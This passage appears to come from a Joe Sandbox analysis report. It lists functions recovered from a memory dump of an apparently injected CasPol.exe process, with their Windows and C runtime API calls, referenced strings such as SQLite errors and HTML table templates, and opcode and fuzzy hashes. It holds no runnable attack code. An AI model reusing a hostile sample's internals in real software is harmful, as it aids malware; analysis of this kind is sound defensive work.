                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                              • API String ID: 3176057301-2039793938
                                                                                                                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                              • database is already attached, xrefs: 0042F721
                                                                                                                                                              • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                              • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                              • out of memory, xrefs: 0042F865
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                              • API String ID: 1297977491-2001300268
                                                                                                                                                              • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                              • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                                                                              • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                              • String ID: ($d
                                                                                                                                                              • API String ID: 1140211610-1915259565
                                                                                                                                                              • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                              • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                              APIs
                                                                                                                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3015003838-0
                                                                                                                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                              • free.MSVCRT ref: 004185AC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2802642348-0
                                                                                                                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                              APIs
                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                              • memset.MSVCRT ref: 00413ADC
                                                                                                                                                              • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                              • memset.MSVCRT ref: 00413BD7
                                                                                                                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                              • String ID: 3A
                                                                                                                                                              • API String ID: 3300951397-293699754
                                                                                                                                                              • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                              • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                              • String ID: strings
                                                                                                                                                              • API String ID: 3166385802-3030018805
                                                                                                                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                              • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                              • String ID: AE$.cfg$General$EA
                                                                                                                                                              • API String ID: 776488737-1622828088
                                                                                                                                                              • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                              • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                              • memset.MSVCRT ref: 0040D906
                                                                                                                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                              • String ID: sysdatetimepick32
                                                                                                                                                              • API String ID: 1028950076-4169760276
                                                                                                                                                              • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                              • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                              • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                              • String ID: -journal$-wal
                                                                                                                                                              • API String ID: 438689982-2894717839
                                                                                                                                                              • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                              • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4218492932-0
                                                                                                                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                              • String ID: gj
                                                                                                                                                              • API String ID: 438689982-4203073231
                                                                                                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                              • memset.MSVCRT ref: 00405ABB
                                                                                                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4281309102-0
                                                                                                                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintfwcscat
                                                                                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                              • API String ID: 384018552-4153097237
                                                                                                                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                              • String ID: 0$6
                                                                                                                                                              • API String ID: 2029023288-3849865405
                                                                                                                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                              • memset.MSVCRT ref: 00405455
                                                                                                                                                              • memset.MSVCRT ref: 0040546C
                                                                                                                                                              • memset.MSVCRT ref: 00405483
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$memcpy$ErrorLast
                                                                                                                                                              • String ID: 6$\
                                                                                                                                                              • API String ID: 404372293-1284684873
                                                                                                                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                              APIs
                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1331804452-0
                                                                                                                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
